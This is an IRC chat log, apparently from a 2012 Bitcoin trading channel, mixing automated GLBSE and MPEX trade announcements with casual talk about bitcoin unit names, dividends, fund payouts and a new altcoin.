loss ? Sep 17 21:31:07 Div was lower yes, total loss I dont know. Sep 17 21:31:41 Has to be some profit for a div I assume. Sep 17 21:32:16 ah ok Sep 17 21:33:50 [GLBSE] [PUREMINING] 5 @ 0.0953 = 0.4765 BTC [+] Sep 17 21:35:05 [MPEX] [S.MPOE] 38722 @ 0.00040704 = 15.7614 BTC [-] Sep 17 21:35:47 speaking of SS, dividend paid Sep 17 21:36:03 [GLBSE] [PUREMINING] 7 @ 0.0953 = 0.6671 BTC [+] Sep 17 21:36:19 Yay I have btc again! Sep 17 21:38:06 thanks for the good words Doffx :) Sep 17 21:38:38 :) Sep 17 21:38:57 um Sep 17 21:39:09 what the name of the 0.1 btc unit Sep 17 21:39:27 decibit ? Sep 17 21:39:32 meh Sep 17 21:39:39 bit dime? Sep 17 21:39:44 [GLBSE] [DMC] 1 @ 0.07 BTC [-] Sep 17 21:39:45 couldn't be Sep 17 21:39:46 hm Sep 17 21:40:02 Bit Dame Sep 17 21:40:05 it would be decibit, right? Sep 17 21:40:11 i think so Sep 17 21:40:19 only the satoshi has a special name, iirc Sep 17 21:40:39 >>Fractions of bitcoins will occasionally be referenced in bitcents, or multiples of 0.01 BTC. Sep 17 21:40:39 >>The SI (metric) system of measurement units uses for fraction deci- (1/10th), centi- (1/100th), milli- (1/1000th), micro- (1/1000000th), and so on. Sep 17 21:41:01 bitcent and decibit? Sep 17 21:41:18 i need this, seriously. Sep 17 21:41:32 it's millibitcoin or mBTC for 1/1000th Sep 17 21:41:37 bitcent is a more general term Sep 17 21:41:50 encompasing all sub1btc amounts Sep 17 21:41:52 so I'd say decibitcoin or dBTC for 1/10th =P Sep 17 21:42:02 Sounds awful, yes Sep 17 21:42:15 deciBTC tho Sep 17 21:42:18 not decibit Sep 17 21:42:50 I just said that =/ Sep 17 21:43:06 except I spelled out bitcoin Sep 17 21:43:19 [GLBSE] [OBSI.HRPT] 24 @ 0.10225 = 2.454 BTC [-] Sep 17 21:43:20 ok Sep 17 21:43:20 [GLBSE] [OBSI.HRPT] 50 @ 0.1028999 = 5.145 BTC [+] Sep 17 21:43:22 [GLBSE] [OBSI.HRPT] 42 @ 0.1029 = 4.3218 BTC [+] Sep 17 21:43:23 BTC-Mining ya i was still reading a little above Sep 17 21:43:25 thank you for your input Sep 17 21:43:42 decibit sounds meaningless, bits and bytes dont' have partials, do they? Sep 17 21:43:53 [GLBSE] [OBSI.HRPT] 4 @ 0.1029 = 0.4116 BTC [+] Sep 17 21:44:13 heh, i prefer kibiBTC = 1024 BTC , mebiBTC = 1048576 BTC :D Sep 17 21:44:28 fixed: KiBTC, miBTC Sep 17 21:44:33 numbers trolls Sep 17 21:44:38 :P Sep 17 21:44:47 o look, it's jurov Sep 17 21:45:01 your struly Sep 17 21:45:36 mirce, heard the news already? Sep 17 21:45:47 which ? Sep 17 21:45:56 The War is over? Sep 17 21:46:16 online MPEx brokerage coming soon: http://coinbr.com/comingsoon.png Sep 17 21:46:16 The War never is over Sep 17 21:46:31 The War?, is over possible? Sep 17 21:46:37 That's why we have peace ministeries Sep 17 21:46:38 war is peace Sep 17 21:46:43 eeee Sep 17 21:46:57 kickass Sep 17 21:47:01 ya sorry i meant decibitcoin not decibit, i was just lazy Sep 17 21:47:19 ajahaha the siren ? srsly ?! Sep 17 21:47:44 yeah, bought it for 2BTC.. then found out you removed all grahics, sadly Sep 17 21:48:01 lol oops Sep 17 21:51:42 perhaps you meant depraved? Sep 17 21:53:16 and imho, "doll" fits better than "puppet" :D Sep 17 21:53:19 [GLBSE] [OBSI.HRPT] 3 @ 0.1029 = 0.3087 BTC [+] Sep 17 21:53:51 [GLBSE] [OBSI.HRPT] 1 @ 0.1029 BTC [+] Sep 17 21:56:31 well, one man's depravity is another's treasure Sep 17 21:58:14 sorry for my rambling, i got into habit of one glass wine in the evening and perhaps i'm not accomodated yet Sep 17 22:02:03 [MPEX] [S.MPOE] 1378 @ 0.00040704 = 0.5609 BTC [-] Sep 17 22:02:05 [MPEX] [S.MPOE] 10800 @ 0.00040704 = 4.396 BTC [-] Sep 17 22:02:06 [MPEX] [S.MPOE] 1427 @ 0.00040704 = 0.5808 BTC [-] Sep 17 22:02:07 [MPEX] [S.MPOE] 24800 @ 0.00040704 = 10.0946 BTC [-] Sep 17 22:02:09 [MPEX] [S.MPOE] 16259 @ 0.00040704 = 6.6181 BTC [-] Sep 17 22:02:18 lol jurov, wine's good for ya. Sep 17 22:02:30 Only the deep reds really Sep 17 22:03:15 Helps with the alkalinity of the body, makes it so bad bacteria cannot thrive very well. Sep 17 22:03:29 ahaha! S.MPOE is priced by the satoshi nao Sep 17 22:03:35 The white wines don’t do that as much. Sep 17 22:04:03 [MPEX] [S.MPOE] 40000 @ 0.00040704 = 16.2816 BTC [-] Sep 17 22:04:05 [MPEX] [S.MPOE] 17941 @ 0.00040704 = 7.3027 BTC [-] Sep 17 22:04:06 [MPEX] [S.MPOE] 51740 @ 0.00040703 = 21.0597 BTC [-] Sep 17 22:04:07 [MPEX] [S.MPOE] 1956 @ 0.000407 = 0.7961 BTC [-] Sep 17 22:04:08 [MPEX] [S.MPOE] 60300 @ 0.00040699 = 24.5415 BTC [-] Sep 17 22:04:09 [MPEX] [S.MPOE] 17263 @ 0.00040698 = 7.0257 BTC [-] Sep 17 22:04:10 [MPEX] [S.MPOE] 41000 @ 0.00040697 = 16.6858 BTC [-] Sep 17 22:04:11 [MPEX] [S.MPOE] 19000 @ 0.00040696 = 7.7322 BTC [-] Sep 17 22:04:12 [MPEX] [S.MPOE] 10809 @ 0.00040695 = 4.3987 BTC [-] Sep 17 22:04:13 [MPEX] [S.MPOE] 40730 @ 0.00040694 = 16.5747 BTC [-] Sep 17 22:04:15 [MPEX] [S.MPOE] 27800 @ 0.00040693 = 11.3127 BTC [-] Sep 17 22:04:16 [MPEX] [S.MPOE] 51300 @ 0.00040693 = 20.8755 BTC [-] Sep 17 22:04:16 [MPEX] [S.MPOE] 13071 @ 0.00040693 = 5.319 BTC [-] Sep 17 22:04:17 [MPEX] [S.MPOE] 56599 @ 0.00040693 = 23.0318 BTC [-] Sep 17 22:04:18 [MPEX] [S.MPOE] 36800 @ 0.00040693 = 14.975 BTC [-] Sep 17 22:04:19 [MPEX] [S.MPOE] 1200 @ 0.00040693 = 0.4883 BTC [-] Sep 17 22:04:20 [MPEX] [S.MPOE] 60800 @ 0.00040691 = 24.7401 BTC [-] Sep 17 22:04:21 [MPEX] [S.MPOE] 21451 @ 0.00040658 = 8.7215 BTC [-] Sep 17 22:04:22 [MPEX] [S.MPOE] 48859 @ 0.00040555 = 19.8148 BTC [-] Sep 17 22:04:23 [MPEX] [S.MPOE] 9726 @ 0.00040103 = 3.9004 BTC [-] Sep 17 22:04:24 [MPEX] [S.MPOE] 18800 @ 0.00040075 = 7.5341 BTC [-] Sep 17 22:04:25 [MPEX] [S.MPOE] 2523 @ 0.00040059 = 1.0107 BTC [-] Sep 17 22:04:26 [MPEX] [S.MPOE] 332 @ 0.00040017 = 0.1329 BTC [-] Sep 17 22:04:59 Why the sell off mircea_popescu? Sep 17 22:05:02 [MPEX] [F.GIGA.ETF] 40710 @ 0.00039 = 15.8769 BTC [+] Sep 17 22:05:09 cause it sucks im sure. Sep 17 22:05:23 I dont even know what it is. Sep 17 22:05:41 o srsly ? Sep 17 22:05:56 well, there's only two actual businesses making actual bitcoin in btcworld. Sep 17 22:06:01 one's s.dice the other's this. Sep 17 22:06:04 [MPEX] [S.MPOE] 20686 @ 0.00040017 = 8.2779 BTC [-] Sep 17 22:06:05 [MPEX] [S.MPOE] 58872 @ 0.00039876 = 23.4758 BTC [-] Sep 17 22:06:06 [MPEX] [S.MPOE] 10800 @ 0.00039774 = 4.2956 BTC [-] Sep 17 22:06:07 [MPEX] [S.MPOE] 15348 @ 0.00039564 = 6.0723 BTC [-] Sep 17 22:06:08 [MPEX] [S.MPOE] 43400 @ 0.00039511 = 17.1478 BTC [-] Sep 17 22:06:09 I never looked at it before, I think ive read all the other things on mpex Sep 17 22:06:09 [MPEX] [S.MPOE] 50894 @ 0.00039501 = 20.1036 BTC [-] Sep 17 22:10:22 Ok I am looking at it right now, the info is almost worthless completely on the front page. Sep 17 22:10:33 [GLBSE] [OBSI.HRPT] 7 @ 0.1029 = 0.7203 BTC [+] Sep 17 22:10:36 Doffx hm Sep 17 22:10:42 That and I have to translate it from romainian wtf Sep 17 22:10:44 :) Sep 17 22:10:49 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Sep 17 22:10:58 srsly, there's an ipo details link, no good ? Sep 17 22:12:20 That better, ill have to read it when im not pre-occupied with something else because it doesnt make sense yet. Sep 17 22:12:25 https://mashable.com/2012/09/17/barack-obama-mc-hammer/ Sep 17 22:12:32 prolly takes a few re-reads anyway Sep 17 22:14:28 Why do you say it sucks if its yours? Sep 17 22:14:48 The selloff sucks... Sep 17 22:14:50 Your're confusing me even more with that statement. Sep 17 22:15:04 or the actual value compared to bids Sep 17 22:15:27 or any other obnoxious actual meaning Sep 17 22:15:27 I'm easily confused with these things can you tell? Sep 17 22:15:35 hehe Sep 17 22:16:40 Doffx i was being teh sarcastic. Sep 17 22:16:53 Ok, well that makes a lot more sense. Sep 17 22:17:15 i said it sucks cause i'm an asshole basically. you hear that reeses ? Sep 17 22:17:18 Someone obviously just needed some btc Sep 17 22:17:40 you are an asshole, asshole Sep 17 22:17:47 in fact, you’re the whole ass Sep 17 22:18:07 no holo. Sep 17 22:19:57 [GLBSE] [RAREEARTH] 1 @ 0.0096 BTC [+] Sep 17 22:20:25 Who was looking for something to sort tables on GLBSE? Sep 17 22:27:16 [GLBSE] [FPGAMINING] 1 @ 0.6869 BTC [+] Sep 17 22:27:44 you didnt build that Sep 17 22:28:13 you didnt build that Sep 17 22:28:14 you didnt build that Sep 17 22:28:18 you didnt build that Sep 17 22:28:29 (breakdown) Sep 17 22:28:34 stop, obama time. Sep 17 22:29:11 lol Sep 17 22:30:33 [GLBSE] [FPGAMINING] 2 @ 0.687 = 1.374 BTC [+] Sep 17 22:32:22 [MPEX] [S.MPOE] 44210 @ 0.00040705 = 17.9957 BTC [+] Sep 17 22:32:23 [MPEX] [S.MPOE] 1197 @ 0.00040705 = 0.4872 BTC [+] Sep 17 22:32:25 [MPEX] [S.MPOE] 1000 @ 0.00040705 = 0.4071 BTC [+] Sep 17 22:32:26 [MPEX] [S.MPOE] 7754 @ 0.00040705 = 3.1563 BTC [+] Sep 17 22:32:27 [MPEX] [S.MPOE] 3300 @ 0.00040706 = 1.3433 BTC [+] Sep 17 22:32:27 [MPEX] [S.MPOE] 335 @ 0.00040706 = 0.1364 BTC [+] Sep 17 22:32:28 [MPEX] [S.MPOE] 12204 @ 0.00040708 = 4.968 BTC [+] Sep 17 22:32:33 i haven't succeded because of the state, i've succeded in spite of it :P Sep 17 22:33:14 ahh, the coming years will be so pleasant :D Sep 17 22:34:20 Ok, see that time I knew you were being sarcastic mircea_popescu. Sep 17 22:34:57 nono, i was straight. Sep 17 22:35:16 there's this cheeky ex-stripper in a household talking smack Sep 17 22:35:19 and it's going to starve Sep 17 22:35:23 (yes, i mean the state). Sep 17 22:35:30 [GLBSE] [FPGAMINING] 1 @ 0.6879 BTC [+] Sep 17 22:38:52 < mircea_popescu> nono, i was straight. << so you're telling me there's a chance ... for me to bed you Sep 17 22:39:12 ughhm !? you a gal ? Sep 17 22:39:57 'was' connotationally implies your arn't now ;) Sep 17 22:40:04 [MPEX] [F.GIGA.ETF] 11842 @ 0.00037222 = 4.4078 BTC [-] Sep 17 22:40:05 o i c Sep 17 22:40:06 [MPEX] [F.GIGA.ETF] 2162 @ 0.00036953 = 0.7989 BTC [-] Sep 17 22:40:07 [MPEX] [F.GIGA.ETF] 1071 @ 0.00036935 = 0.3956 BTC [-] Sep 17 22:40:08 [MPEX] [F.GIGA.ETF] 4300 @ 0.00036856 = 1.5848 BTC [-] Sep 17 22:40:08 [MPEX] [F.GIGA.ETF] 2810 @ 0.00036785 = 1.0337 BTC [-] Sep 17 22:40:09 [MPEX] [F.GIGA.ETF] 500 @ 0.00036767 = 0.1838 BTC [-] Sep 17 22:40:10 [MPEX] [F.GIGA.ETF] 2000 @ 0.00036762 = 0.7352 BTC [-] Sep 17 22:40:11 [MPEX] [F.GIGA.ETF] 2315 @ 0.00036731 = 0.8503 BTC [-] Sep 17 22:41:33 using this commonly held belief about the word was, it's fun to do things like: Sep 17 22:41:54 [GLBSE] [SS] 8 @ 0.025 = 0.2 BTC [-] Sep 17 22:41:58 walk up to someone and say, "I was lost, can you help me?" Sep 17 22:42:19 they look baffled, often Sep 17 22:42:56 sounds like a cheezy pickup line Sep 17 22:43:05 add "in your eyes" for max cheez. Sep 17 22:43:51 I was lost, can you help me in your eyes? I bear the flesh of cuthulu Sep 17 22:45:22 cute-hulhu Sep 17 22:46:59 [GLBSE] [NYAN.C] 2 @ 0.299 = 0.598 BTC [-] Sep 17 22:47:00 [GLBSE] [NYAN.C] 10 @ 0.31 = 3.1 BTC [+] Sep 17 22:47:02 [GLBSE] [NYAN.C] 74 @ 0.33 = 24.42 BTC [+] Sep 17 22:47:03 [GLBSE] [NYAN.C] 9 @ 0.397 = 3.573 BTC [+] Sep 17 22:47:04 [GLBSE] [NYAN.C] 1 @ 0.3975 BTC [+] Sep 17 22:47:04 [GLBSE] [NYAN.C] 1 @ 0.39789 BTC [+] Sep 17 22:47:06 [GLBSE] [NYAN.C] 3 @ 0.3979 = 1.1937 BTC [+] Sep 17 22:47:48 wasn't this thing .7 or w/e last week ? Sep 17 22:49:01 Last week was centuries ago... Sep 17 22:49:49 [GLBSE] [ASIC.COOP] 3 @ 0.175 = 0.525 BTC [-] Sep 17 22:51:28 [GLBSE] [NYAN.C] 6 @ 0.3979 = 2.3874 BTC [+] Sep 17 22:51:29 [GLBSE] [NYAN.C] 5 @ 0.4 = 2 BTC [+] Sep 17 22:51:30 [GLBSE] [NYAN.C] 10 @ 0.4 = 4 BTC [+] Sep 17 22:53:00 [MPEX] [F.GIGA.ETF] 8642 @ 0.00036731 = 3.1743 BTC [-] Sep 17 22:53:01 [MPEX] [F.GIGA.ETF] 7680 @ 0.00036622 = 2.8126 BTC [-] Sep 17 22:53:03 [MPEX] [F.GIGA.ETF] 8900 @ 0.00036311 = 3.2317 BTC [-] Sep 17 22:53:04 [MPEX] [F.GIGA.ETF] 13742 @ 0.00036274 = 4.9848 BTC [-] Sep 17 22:53:05 [MPEX] [F.GIGA.ETF] 4800 @ 0.00036259 = 1.7404 BTC [-] Sep 17 22:53:06 [MPEX] [F.GIGA.ETF] 4082 @ 0.00036194 = 1.4774 BTC [-] Sep 17 22:53:08 [MPEX] [F.GIGA.ETF] 2900 @ 0.00035945 = 1.0424 BTC [-] Sep 17 22:53:08 [MPEX] [F.GIGA.ETF] 8600 @ 0.00035821 = 3.0806 BTC [-] Sep 17 22:53:09 [MPEX] [F.GIGA.ETF] 9000 @ 0.00035789 = 3.221 BTC [-] Sep 17 22:53:10 [MPEX] [F.GIGA.ETF] 900 @ 0.0003576 = 0.3218 BTC [-] Sep 17 22:53:11 [MPEX] [F.GIGA.ETF] 11200 @ 0.00035607 = 3.988 BTC [-] Sep 17 22:53:12 [MPEX] [F.GIGA.ETF] 5500 @ 0.00035584 = 1.9571 BTC [-] Sep 17 22:53:13 [MPEX] [F.GIGA.ETF] 7300 @ 0.00035524 = 2.5933 BTC [-] Sep 17 22:53:15 [MPEX] [F.GIGA.ETF] 12900 @ 0.00035518 = 4.5818 BTC [-] Sep 17 22:53:16 [MPEX] [F.GIGA.ETF] 10700 @ 0.00035005 = 3.7455 BTC [-] Sep 17 22:53:17 [MPEX] [F.GIGA.ETF] 13666 @ 0.00034866 = 4.7648 BTC [-] Sep 17 22:53:17 [MPEX] [F.GIGA.ETF] 5800 @ 0.00034763 = 2.0163 BTC [-] Sep 17 22:53:18 [GLBSE] [OBSI.HRPT] 10 @ 0.1029 = 1.029 BTC [+] Sep 17 22:53:37 [GLBSE] [FPGAMINING] 1 @ 0.6879 BTC [+] Sep 17 22:54:51 [GLBSE] [OBSI.HRPT] 6 @ 0.1029 = 0.6174 BTC [+] Sep 17 22:54:53 [GLBSE] [OBSI.HRPT] 6 @ 0.102999 = 0.618 BTC [+] Sep 17 22:55:51 [GLBSE] [OBSI.HRPT] 14 @ 0.102999 = 1.442 BTC [+] Sep 17 22:55:52 [GLBSE] [OBSI.HRPT] 76 @ 0.103 = 7.828 BTC [+] Sep 17 22:57:31 [GLBSE] [OBSI.HRPT] 15 @ 0.103 = 1.545 BTC [+] Sep 17 22:57:44 What does this mean for NYAN.A Sep 17 22:57:46 value Sep 17 22:58:16 divdends continue to pay on NYAN.A? Sep 17 22:58:29 [GLBSE] [RSM] 11 @ 0.3 = 3.3 BTC [+] Sep 17 23:09:05 [GLBSE] [ASICMINER] 10 @ 0.115 = 1.15 BTC [+] Sep 17 23:09:07 [GLBSE] [ASICMINER] 5 @ 0.1165 = 0.5825 BTC [+] Sep 17 23:09:07 [GLBSE] [ASICMINER] 25 @ 0.1188956 = 2.9724 BTC [+] Sep 17 23:09:08 [GLBSE] [ASICMINER] 21 @ 0.1188966 = 2.4968 BTC [+] Sep 17 23:09:10 Nah, BTC-BOND is safer =P Sep 17 23:09:10 [GLBSE] [ASICMINER] 2 @ 0.1188967 = 0.2378 BTC [+] Sep 17 23:09:11 [GLBSE] [ASICMINER] 30 @ 0.11899999 = 3.57 BTC [+] Sep 17 23:09:12 [GLBSE] [ASICMINER] 148 @ 0.119 = 17.612 BTC [+] Sep 17 23:09:13 [GLBSE] [ASICMINER] 35 @ 0.11919 = 4.1717 BTC [+] Sep 17 23:09:14 [GLBSE] [ASICMINER] 30 @ 0.11929399 = 3.5788 BTC [+] Sep 17 23:09:15 [GLBSE] [ASICMINER] 69 @ 0.119595 = 8.2521 BTC [+] Sep 17 23:09:16 [GLBSE] [ASICMINER] 125 @ 0.119798 = 14.9748 BTC [+] Sep 17 23:10:28 Your advertising got lost on the middle of yet another asic spasm :P Sep 17 23:11:57 <[\\\]> hey, as long as its climbing, let it spasm Sep 17 23:18:57 [MPEX] [F.GIGA.ETF] 2100 @ 0.00034763 = 0.73 BTC [-] Sep 17 23:18:59 [MPEX] [F.GIGA.ETF] 6500 @ 0.00034545 = 2.2454 BTC [-] Sep 17 23:19:00 [MPEX] [F.GIGA.ETF] 800 @ 0.00033448 = 0.2676 BTC [-] Sep 17 23:20:07 [GLBSE] [OBSI.HRPT] 1 @ 0.10160001 BTC [-] Sep 17 23:22:29 [GLBSE] [TYGRR.BOND-P] 12 @ 0.1 = 1.2 BTC [-] Sep 17 23:26:35 [GLBSE] [FPGAMINING] 1 @ 0.688 BTC [+] Sep 17 23:27:04 [MPEX] [F.GIGA.ETF] 20100 @ 0.00033448 = 6.723 BTC [-] Sep 17 23:27:04 [MPEX] [F.GIGA.ETF] 593497 @ 0.00032 = 189.919 BTC [-] Sep 17 23:27:16 [GLBSE] [ASICMINER] 23 @ 0.117 = 2.691 BTC [-] Sep 17 23:28:54 [GLBSE] [OBSI.HRPT] 1 @ 0.1029 BTC [+] Sep 17 23:31:09 [GLBSE] [NASTY] 1 @ 0.515 BTC [-] Sep 17 23:31:10 [GLBSE] [NASTY] 1 @ 0.515 BTC [-] Sep 17 23:31:58 [GLBSE] [OBSI.HRPT] 99 @ 0.1029 = 10.1871 BTC [+] Sep 17 23:32:00 [GLBSE] [OBSI.HRPT] 701 @ 0.103 = 72.203 BTC [+] Sep 17 23:34:22 [GLBSE] [OBSI.HRPT] 200 @ 0.103 = 20.6 BTC [+] Sep 17 23:38:25 [GLBSE] [GIGAMINING] 1 @ 0.57 BTC [-] Sep 17 23:39:51 [GLBSE] [BITBOND] 1 @ 0.32 BTC [+] Sep 17 23:41:51 [GLBSE] [FUTUREFUND] 8 @ 0.00012936 = 0.001 BTC [+] Sep 17 23:42:05 [GLBSE] [JTME] 1 @ 0.6 BTC [-] Sep 17 23:43:55 [GLBSE] [CPA] 1 @ 0.0329 BTC [-] Sep 17 23:43:57 [GLBSE] [CPA] 2604 @ 0.03499999 = 91.14 BTC [+] Sep 17 23:55:25 [GLBSE] [TYGRR.BOND-P] 1 @ 0.059 BTC [-] Sep 17 23:56:35 [GLBSE] [HYDRO.BONDS] 1 @ 1.37478 BTC [-] Sep 17 23:58:43 [GLBSE] [TYGRR.BOND-P] 239 @ 0.05 = 11.95 BTC [-] Sep 17 23:59:14 [GLBSE] [TYGRR.BOND-P] 7 @ 0.1 = 0.7 BTC [+] Sep 18 00:01:34 [GLBSE] [PUREMINING] 1 @ 0.09589999 BTC [+] Sep 18 00:03:53 [GLBSE] [PUREMINING] 10 @ 0.0959 = 0.959 BTC [+] Sep 18 00:05:21 [GLBSE] [PUREMINING] 2 @ 0.0959 = 0.1918 BTC [+] Sep 18 00:05:30 [GLBSE] [NYAN.A] 1 @ 0.999999 BTC [+] Sep 18 00:06:03 [MPEX] [F.GIGA.ETF] 5635 @ 0.00032925 = 1.8553 BTC [+] Sep 18 00:06:49 [GLBSE] [PUREMINING] 10 @ 0.096 = 0.96 BTC [+] Sep 18 00:08:10 Congratulations, Usagi. Sep 18 00:08:19 CPA is recovering with grace. Sep 18 00:09:24 [GLBSE] [FPGAMINING] 1 @ 0.688 BTC [+] Sep 18 00:09:42 Unless this is of your doing, heh. Sep 18 00:10:05 sup atlas Sep 18 00:10:27 [GLBSE] [TYGRR.BOND-P] 10 @ 0.047 = 0.47 BTC [-] Sep 18 00:10:29 [GLBSE] [TYGRR.BOND-P] 4 @ 0.046011 = 0.184 BTC [-] Sep 18 00:10:30 [GLBSE] [TYGRR.BOND-P] 5 @ 0.04601 = 0.2301 BTC [-] Sep 18 00:10:31 [GLBSE] [TYGRR.BOND-P] 1 @ 0.046 BTC [-] Sep 18 00:10:32 [GLBSE] [TYGRR.BOND-P] 6 @ 0.04500001 = 0.27 BTC [-] Sep 18 00:12:18 [GLBSE] [OBSI.HRPT] 1 @ 0.1029 BTC [-] Sep 18 00:13:53 [MPEX] [F.GIGA.ETF] 14910 @ 0.00032164 = 4.7957 BTC [-] Sep 18 00:13:55 [MPEX] [F.GIGA.ETF] 6503 @ 0.00032 = 2.081 BTC [-] Sep 18 00:13:56 [MPEX] [F.GIGA.ETF] 4684 @ 0.00031071 = 1.4554 BTC [-] Sep 18 00:13:58 [MPEX] [F.GIGA.ETF] 3657 @ 0.0003006 = 1.0993 BTC [-] Sep 18 00:13:58 [MPEX] [F.GIGA.ETF] 40500 @ 0.00029489 = 11.943 BTC [-] Sep 18 00:13:59 [MPEX] [F.GIGA.ETF] 29146 @ 0.00028 = 8.1609 BTC [-] Sep 18 00:15:37 wow Sep 18 00:15:42 so Puppet is atlas? Sep 18 00:15:50 https://bitcointalk.org/index.php?topic=77469.msg1198667#msg1198667 Sep 18 00:18:17 is usagi going to be running DMC now? Sep 18 00:19:11 no Sep 18 00:19:20 hes acting has PR man for the time being Sep 18 00:19:29 PR 'man' Sep 18 00:22:08 EskimoBob: ? Sep 18 00:22:25 the only thing popescu is using is crack. Sep 18 00:22:41 lol Sep 18 00:22:49 that is rich Sep 18 00:23:29 crack is ambiguous in that sentence. Sep 18 00:25:50 mircea_popescu: a form of freebase cocaine made using sodium bicarbonate instead of diethyl ether Sep 18 00:26:09 a, that. Sep 18 00:28:59 probably never Sep 18 00:29:12 That would be hilarious to watch. small asian woman pissing in to the wind. Sep 18 00:29:33 Doffx: usagi is a guy Sep 18 00:29:38 I assume however that Usagi is actually a man Sep 18 00:29:44 Diablo-D3: citation needed Sep 18 00:31:40 lol Sep 18 00:33:22 holy shit look at ppcoin Sep 18 00:35:02 ppcoin ?! Sep 18 00:35:13 yes peepeecoin Sep 18 00:35:30 proof-of-stake alt coin Sep 18 00:37:18 aha ? i don't know it. Sep 18 00:38:48 https://bitcointalk.org/index.php?topic=101820.0 Sep 18 00:39:06 ty Sep 18 00:40:32 to many issues, don't know where to start.. Sep 18 00:40:32 1), much of all the files says Bitcoin instead of PPcoin Sep 18 00:40:32 2), i just installed the client, the only thing i got was an uninstall file Sep 18 00:40:33 lol k Sep 18 00:41:05 [MPEX] [S.MPOE] 6603 @ 0.00040698 = 2.6873 BTC [-] Sep 18 00:43:49 [GLBSE] [GIGAMINING] 2 @ 0.5531001 = 1.1062 BTC [-] Sep 18 00:43:50 [GLBSE] [GIGAMINING] 2 @ 0.55310001 = 1.1062 BTC [-] Sep 18 00:43:51 [GLBSE] [GIGAMINING] 6 @ 0.5531 = 3.3186 BTC [-] Sep 18 00:43:52 [GLBSE] [GIGAMINING] 2 @ 0.552 = 1.104 BTC [-] Sep 18 00:43:54 [GLBSE] [GIGAMINING] 6 @ 0.552 = 3.312 BTC [-] Sep 18 00:44:17 someone is unhappy i paid out a coupon payment i guess Sep 18 00:44:29 ??? Sep 18 00:44:34 gotdamn coupons Sep 18 00:44:35 .55, could be worse. Sep 18 00:44:45 Don't worry Sep 18 00:44:49 I'm coming Sep 18 00:44:57 [GLBSE] [BITBOND] 8 @ 0.3101 = 2.4808 BTC [-] Sep 18 00:44:59 [GLBSE] [BITBOND] 3 @ 0.300101 = 0.9003 BTC [-] Sep 18 00:45:00 [GLBSE] [BITBOND] 2 @ 0.3001001 = 0.6002 BTC [-] Sep 18 00:45:01 [GLBSE] [BITBOND] 9 @ 0.3001 = 2.7009 BTC [-] Sep 18 00:45:23 probably just people didtching GLBSCAME Sep 18 00:45:45 GLOBALSCAM EXCHANGE Sep 18 00:45:58 i'm sad they don't want to come on the teramining ride Sep 18 00:46:03 divideds are supposed to drop a stock price = to the amount of the dividend Sep 18 00:46:14 <[\\\]> lol Sep 18 00:46:20 <[\\\]> no Sep 18 00:46:25 [GLBSE] [NASTY] 1 @ 0.44650001 BTC [-] Sep 18 00:46:27 <[\\\]> clearly you're misinformed. Sep 18 00:46:32 inform me Sep 18 00:47:12 o wait, i'm a scammer, didn't you know, i can't be trusted Sep 18 00:47:34 mircea_popescu been meaning to ask you Sep 18 00:47:43 <[\\\]> Stock price isn't tied to a dividend yield. Sep 18 00:47:53 <[\\\]> A dividend of .05 doesn't magically drop the price .05 Sep 18 00:48:01 are you going to upgrade your fund bonds to teramining? Sep 18 00:48:08 [\\\] well the btc finances are bizzare Sep 18 00:48:18 gigavps my contract says i will distribute whatever you give out Sep 18 00:48:20 http://www.investopedia.com/articles/stocks/07/dividend_implications.asp Sep 18 00:48:25 so, im'a distribute whatever you give out. Sep 18 00:49:05 well, your bonds have value for the upgrade, it might be why the fund is trading lower than gigamining on glbse Sep 18 00:49:11 possibly, yea. Sep 18 00:49:14 ha Sep 18 00:49:19 so funny Sep 18 00:49:51 so if the fund is going to go with the paid upgrade path, you might want to make that known Sep 18 00:50:07 or if it's going to go with the free upgrade, or whatever Sep 18 00:50:24 [GLBSE] [SILVER] 2 @ 0.00962 = 0.0192 BTC [-] Sep 18 00:50:36 mircea_popescu may know all of this and he wants the price to be low :o Sep 18 00:50:47 i kid, i kid Sep 18 00:51:01 [GLBSE] [OBSI.HRPT] 11 @ 0.1029 = 1.1319 BTC [-] Sep 18 00:51:10 well, i can't issue statements based on what you might or might not do, plan to do, w/e. Sep 18 00:51:22 the only statement is that giga.etf pays out everything it receives. Sep 18 00:51:30 understood Sep 18 00:51:50 [GLBSE] [BDK] 1 @ 0.01000001 BTC [-] Sep 18 00:52:05 personally i think it's all a moot point in the sense there won't be asics delivered this year, but that has little bearing. Sep 18 00:54:01 hm Sep 18 00:54:02 http://polimedia.us/bitcoin/mpex.php?mpsic=F.GIGA.ETF Sep 18 00:54:13 [GLBSE] [ASIC.COOP] 1 @ 0.5 BTC [+] Sep 18 00:54:14 where is the 8.7.12 dividend Sep 18 00:54:59 <[\\\]> Cutbacks, vandroiy won that bet and all... Sep 18 00:55:56 kakobrekla at that time i was holding it all so didn't bother. Sep 18 00:56:08 prolly a mistake in retrospect. Sep 18 01:05:09 I shouldn't talk about bitcoins to people... Sep 18 01:05:36 Seems like they get interested in getting bitcoins but not in securing their computer... Sep 18 01:06:22 (and proceed to make the half they were interested in happen) Sep 18 01:07:29 [MPEX] [S.MPOE] 17300 @ 0.000407 = 7.0411 BTC [+] Sep 18 01:08:24 Print them a paper wallet Sep 18 01:08:47 [///]:Price Implications When a dividend is paid, several things can happen. The first of these is what happens to the price of the security and various items tied to it. On the ex-dividend date, the stock price is adjusted downward by the amount of the dividend by the exchange on which the stock trades. For most dividends this is usually not observed amidst the up and down movement of a normal day's trading. Sep 18 01:09:03 gigavps: someone really accused you of being a scammer? O.o Sep 18 01:09:04 However, this becomes easily apparent on the ex-dividend dates for larger dividends, such as the $3 payment made by Microsoft in the fall of 2004, which caused shares to fall from $29.97 to $27.34. Read more: http://www.investopedia.com/articles/stocks/07/dividend_implications.asp#ixzz26leDIepI Sep 18 01:09:46 lol, 3$ div, share price drop... would have bought more... Sep 18 01:11:08 [GLBSE] [FPGAMINING] 6 @ 0.6011 = 3.6066 BTC [-] Sep 18 01:11:09 [GLBSE] [FPGAMINING] 4 @ 0.601 = 2.404 BTC [-] Sep 18 01:11:11 [GLBSE] [FPGAMINING] 1 @ 0.6 BTC [-] Sep 18 01:11:12 [GLBSE] [FPGAMINING] 4 @ 0.6 = 2.4 BTC [-] Sep 18 01:11:13 [GLBSE] [FPGAMINING] 2 @ 0.56535 = 1.1307 BTC [-] Sep 18 01:11:14 [GLBSE] [FPGAMINING] 1 @ 0.5652 BTC [-] Sep 18 01:11:15 [GLBSE] [FPGAMINING] 4 @ 0.565 = 2.26 BTC [-] Sep 18 01:11:16 [GLBSE] [FPGAMINING] 9 @ 0.561 = 5.049 BTC [-] Sep 18 01:11:17 [GLBSE] 